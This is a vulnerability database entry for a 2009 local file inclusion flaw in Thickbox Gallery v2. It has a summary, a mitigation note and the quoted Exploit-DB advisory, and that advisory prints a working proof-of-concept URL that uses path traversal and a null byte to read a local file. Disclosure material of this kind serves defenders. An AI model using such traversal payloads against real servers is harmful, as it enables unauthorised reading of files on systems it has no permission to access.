header-logo
Suggest Exploit
vendor:
Thickbox Gallery v2
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Thickbox Gallery v2
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Thickbox Gallery v2 Local File Inclusion Vulnerability

A proof-of-concept (PoC) exploit for a local file inclusion vulnerability in Thickbox Gallery v2 was published. The vulnerability is triggered when a maliciously crafted URL is sent to the vulnerable server. This URL contains a maliciously crafted parameter that can be used to include a file from the local file system. The malicious URL can be used to include a file from the local file system, such as BOOTSECT.BAK.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Thickbox Gallery v2.
Source

Exploit-DB raw data:

##########################################################################################
[+] Thickbox Gallery v2 Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################

[+] Local File Inclusion

   PoC :
    http://127.0.0.1/[path]/index.php?ln=../../../../../../BOOTSECT.BAK%00

##########################################################################################

# milw0rm.com [2009-04-27]

Navigation

Suggest Exploit

Services By CQR